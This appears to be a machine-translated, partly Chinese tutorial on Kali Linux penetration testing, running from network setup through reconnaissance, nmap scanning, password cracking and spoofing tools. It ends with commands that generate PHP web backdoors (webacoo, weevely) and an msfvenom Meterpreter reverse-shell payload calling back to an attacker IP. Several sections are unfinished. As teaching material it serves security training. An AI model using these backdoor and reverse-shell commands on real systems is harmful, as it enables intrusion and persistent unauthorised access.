Kali Linux Introduction and Introduction
1. Main features of kali
Kali official website: https://www.kali.org/
Debian-based Linux distribution
Integrate more than 300 penetration test procedures
Support most wireless network cards
2. Network service configuration
1. Set fixed IP:
Virtual machine network settings file
/etc/network/interfaces
2. Temporary ip configuration command
ifconfig eth0 192.168.43.100 netmask 255.255.255.0 //ip
route add default gw 192.168.43.1 //网关路由
systemctl restart networking.service //重启网络恢复
3. The role of the dmesg command:
View wireless network card hardware information, view kernel ring buffer information
4. Commands to turn the network on and off
You can use the systemctl or service commands here. The syntax is basically the same. The old version of kali may only support the service command.
Common syntaxes are:
start //开启
stop //关闭
restart //重启
5. Commonly used services in kali
http(apache)
service apache2 start // Start
service apache2 stop // Close
service apache2 restart // Restart
update-rc.d apache2 defaults // Self-start
mysql
service mysql start // Start
service mysql stop // Close
service mysql restart // Restart
update-rc.d mysql defaults // Since starting
mysql -u root -p // Login
ssh
service ssh start // Start
service ssh stop // Close
service ssh restart // Restart
update-rc.d ssh defaults // Self-start
3. System update
command
apt-get update
apt-get upgrate
apt-get dist-upgrade
PS: The latest version of the Kali, which is the 2020 version, is not very compatible, and many of my commonly used tools have been removed. Personally, I do not recommend updating, except for needs.
aptcache search <包名> //在软件仓库查找某个软件包的名称
apt-get install <包名> //指定安装某个软件
Penetration testing overview
1. Methodology of five test frameworks
开源安全测试方法论
信息系统安全评估框架
开放式web应用安全项目
web应用安全联合威胁人类
渗透测试执行标准
Second, the universal penetration testing framework
范围界定
信息收集
目标识别
服务枚举
漏洞映射
社会工程学
漏洞利用
提升权限
访问维护
文档报告
Implementation steps of penetration testing
1. Information gathering
Definition, use and usage of whois command
whois example.com
This command will return detailed information about the domain name of the example.com domain name registrant and contact information.
Official website: https://who.is/
DNS record analysis
1. host
host www.example.com
Only return the ip address (ipv4) when there is no parameter
host -a www.example.com
Add parameter -a to return all dns records
2nd dig
dig example.com
When there is no parameter, only the A record address (IPV4) is returned
dig example.com any
Add parameter any to return all dns records
3. dnsenum
dnsenum example.com
By default, it will return the IP address information of the host address, name resolution server and mail server.
If you have a dictionary, you can use this tool to blast the subdomain
dnsenum -f dns.txt example.com
4. dmitry
dmitry -iwnse targethost
Perform whois query
Mining host information on Netcraft.com website
Search all possible subdomains
Search all possible email addresses
dmitry targethost -f -b
Do a simple port scan (very slow and not easy to use, not recommended)
Routing information
1. tcptraceroute
tcptraceroute example.com
It is known that the target web server has opened port 80 using the TCP protocol. Use the above command to obtain complete routing information from the local machine to the target host.
ps: easily blocked by firewall
2. tctrace
tctrace -i eth0 -d example.com
Specify the network card eth0 to obtain routing information between this machine and example.com
Target Recognition
Blog columns penetration testing tools commonly used - target recognition
1. ping
ping -c 10 example.com
ping -c 10 192.168.123.256
The -c parameter specifies the number of packets sent (execution times)
The -i parameter specifies the source address or network interface (network card)
-s specifies the packet size (default size is 64 bytes)
2. arping
arping 192.168.56.102 -c 1
Check whether the host in the LAN is online, -i parameter specifies the network card, -c parameter specifies the number of times
3. fping
fping 192.168.1.1 192.168.1.100 192.168.1.107
Check if the three hosts are online
fping -g 192.168.56.0/24
Detect the entire network segment
fping -r 1 -g 192.168.1.1 192.168.1.10
The parameter -r specifies the number of retries, the default is 3
fping -s www.baidu.com www.cqcet.edu.cn www.csdn.net
-s parameter to view the statistical results of multiple targets
4. Hping3
The main purpose
Test firewall rules
Test intrusion detection system / IDS
Test security vulnerabilities in TCP / IP mode
hping3 -0 192.168.56.101 发送原始IP包(--raw-ip)
hping3 -1 192.168.56.101 发送ICMP包(--icmp)
hping3 -2 192.168.56.101 发送UDP包(--udp)
hping3 -8 192.168.56.101 进入扫描模式(--scan)
hping3 -9 192.168.56.101 进入监听模式(--listen)
5. nping
nping --tcp-connect -c 1 -p 22 192.168.56.102 基础的tcp-connect功能
nping --tcp -c 1 -p 22 192.168.6.102 TCP模式
nping --udp -c 1 -p 22 192.168.6.102 UDP模式
nping --icmp -c 1 -p 22 192.168.6.102 ICMP模式(默认模式)
nping --arp -c 1 -p 22 192.168.6.102 ARP/RARP模式
nping --tr -c 1 -p 22 192.168.6.102 traceroute模式
6. nbtscan
nbtscan 192.168.1.1-254
Search the NetBIOS name of each host in the LAN
nbtscan -hv 192.168.1.1-254
-hv parameter to see which services are running
7. uniscan
Operating system identification
1. p0f
Can identify the following hosts
The machine connected to your host (SYN mode, the default mode)
Machines accessible by the host (SYN + ACK mode)
Machines that the host cannot access (RST + mode)
Machines that can monitor their network communication
p0f -f /etc/p0f/p0f.fp -o p0f.log
Open port 80 for target machine access
2. nmap
nmap -O 192.168.43.89 //操作系统识别
Recognition rate is not very high
Service enumeration
Common tools for penetration testing-amap service enumeration
Network scan
1. nmap
The main function
Host detection
Port scan
Service / version detection
Operating system detection
Network routing
Nmap script engine
nmap -sT 192.168.43.89 //TCP连接扫描
nmap -sS 192.168.43.89 //SYN扫描
nmap -sN 192.168.43.89 //TCP NULL扫描
nmap -sF 192.168.43.89 //TCP FIN扫描
nmap -sX 192.168.43.89 //TCP XMAS扫描
nmap -sM 192.168.43.89 //TCP Maimon扫描
nmap -sA 192.168.43.89 //TCP ACK扫描
nmap -sW 192.168.43.89 //TCP 窗口扫描
nmap -sI 192.168.43.89 //TCP Idel扫描
Scan options
-p 端口范围 :只扫描指定的端口
-F (快速扫描):仅扫描100个常用端口
-r (顺序扫描):按照从小到大的顺序扫描端口
--top-ports <1 or greater> 扫描nmap-services里排名前N的端口
Target port options
Interactive (screen) output
Normal output (-oN) does not display runtime information and warning information
XML file (-oX) The generated XML format file can be converted into an html file, and can also be parsed by the graphical user interface, which is easy to import into the database to
generate for Grep to use Files (-oG)
Output options
-T Specifies the time schedule control mode
Time schedule control options
nmap -sV 192.168.43.89 -p 22 //服务版本识别
nmap -O 192.168.43.89 //操作系统检测
nmap -Pn 192.168.43.89 //禁用主机检测
nmap -A 192.168.43.89 //综合扫描
Common options
-sC 或 --script = default 启动默认类NES脚本
--script <filename>|<category>|<directories> 根据指定的文件名、类别名、目录名,执行相应的脚本
--script-args<args> 给脚本指定参数
Script engine
-f 使用小数据包
--mtu 调整数据包的大小
-D 指定假IP
--source-port<portnumber>或-g 模拟源端口
--data-length 改变发送的数据包的默认长度
--max-parallelism 限制nmap并发扫描的最大连接数
--scan-delay<time> 控制发送探测数据的时间间隔
edit
2. Unicornscan
-m U detect UDP protocol
-m T detect TCP protocol
-Iv View detailed output
-r Adjust the packet sending rate
unicornscan -m U -Iv 192.168.43.89:1-65535 -r 10000
unicornscan -m T -Iv 192.168.43.89:1-65535 -r 10000
SMB enumeration
1. nbtscan
nbtscan 192.168.56.1-254
Search the NetBIOS name of each host in 192.168.56.0
nbtscan -hv 192.168.56.102
View the network service of this host 192.168.56.102
SNMP enumeration
A common tool for penetration testing-ADMsnmp for snmp analysis
1. onesixtyone
onesixtyone 192.168.56.102
SNMP string supported by search host
onesixtyone -d 192.168.56.102
Perform a more detailed scan
2. snmpcheck
snmpcheck -t 192.168.56.102
Collect information about SNMP devices
VPN enumeration
1. ike-scan
ike-scan -M -A -Pike-hashkey 192.168.0.10
Detect, identify, and test an IPSec VPN server
-M divides the decoding information of the payload into multiple lines for easy reading
-A use IKE's aggressive mode
-P Save the hash value of aggressive mode and shared key as a file
Vulnerability mapping
1. Types of vulnerabilities
Local vulnerability
Remote vulnerability
Second, the vulnerability scanner
OpenVAS
Cisco analysis tools
Cisco Auditing Tool(cat)
run:
cd /usr/share/
CAT --help
Commands:
-h specifies the host name (use this option when scanning a single host)
-w specifies the dictionary name (to guess the community string)
-a specifies the password list (to exhaust the password)
-i and [ioshist] (check the IOS Bugs that have appeared in history)
Cisco Global Exploiter (cge)
run:
cd /usr/bin/
cge.pl
command
cge.pl 10.200.213.25 3
The third type of test
FUZZ (fuzzy) analysis tool
BED (to be continued)
JBroFuzz (to be continued)
3. SMB analysis tool
ImpacketSamrdump
(to be continued)
4. SNMP analysis tool
SNMP Walk
(to be continued)
5. Web program analysis tools
Database evaluation tools
DBPwAudit (to be continued)
sqlmap
SQL Ninja (to be continued)
Web Application Evaluation Tool
Burpsuite (to be continued)
Paros Proxy (to be continued)
W3af (to be continued)
WafW00f (to be continued)
Webscarab (to be continued)
Exploit
MSFConsole
MSFConsole_Commonly used modules
MSFConsole_Post-Infiltration Module
Elevation of authority
1. Classification
Vertical elevation
Horizontal Elevation of Rights
Second, the use of local vulnerabilities
3. Password attack
Based on knowledge
Based on all
Feature-based
Offline attack
Online attack
hash-idntifire judgment hash algorithm — Only use the hash algorithm used by the system under test to crack the password
Hashcat multi-thread password cracking, fully using CPU
RainbowCrack uses the rainbow table to crack and exchange space for time
samdump2 crack the password of the windows system account
John cracked the hash, and cracked the DES crypt type is excellent
Graphic version of Johnny John
Crunch creates a password dictionary that can be used for brute force cracking
Ophcrack LM / NTML type based on rainbow table
Online cracking tool
CeWL crawler mode is a tool to collect words on a specified URL, and put the collected words into a dictionary to improve the hit rate of blasting
Hydra crack password online
Medusa crack password online
4. Internet spoofing tools
Network sniffing and network spoofing
DNSchef
DNS reply to the tested host for the DNS server, resolve the domain name to the IP controlled by the attacker, so that the attacker's host plays the role of a real server
arpspoof
Practical tool for assisting network monitoring in switching network
Ettercap
Tools for man-in-the-middle attacks in LAN
Five, network sniffer
Dsniff
tcpdump
Wireshark
Access maintenance
First, the operating system back door
Cymothoa
Intersect
Meter preter
Second, the tunnel tool
dns2tcp
iodine
ncat
proxychains
ptunnel
shocked
sslh
stunnel4
Three, create a web backdoor
WeBaCoo
Command:
-g make backdoor code
-f php function required for backdoor: system (default) / shell_exec / exec / passthru / popen
-o output the file name of the specified backdoor program generated
Example:
webacoo -g -o test.php 使用默认配置生成php后门程序
webacoo -t -u http://192.168.43.89/test.php
Connect to backdoor
weevely
Generate obfuscated PHP backdoor and save the backdoor as display.php
weevely generate password display.php
weevely http://192.168.43.89/display.php password
Access the webshell of the host under test
PHP Meterpreter
-p specifies the payload as php / meterpreter / reverse_tcp
-f Set output format
lhost is the attacker address
lport is the attacker port
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.180 LPORT=1234 -f raw > a.php